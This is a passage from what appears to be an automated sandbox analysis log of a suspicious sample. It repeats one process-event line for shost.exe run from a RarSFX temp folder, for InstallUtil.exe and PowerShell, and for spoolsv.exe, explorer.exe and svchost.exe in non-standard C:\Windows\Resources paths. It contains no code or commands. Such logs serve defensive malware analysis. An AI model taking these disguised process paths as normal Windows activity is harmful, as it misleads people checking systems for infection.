Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Resources\spoolsv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Resources\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
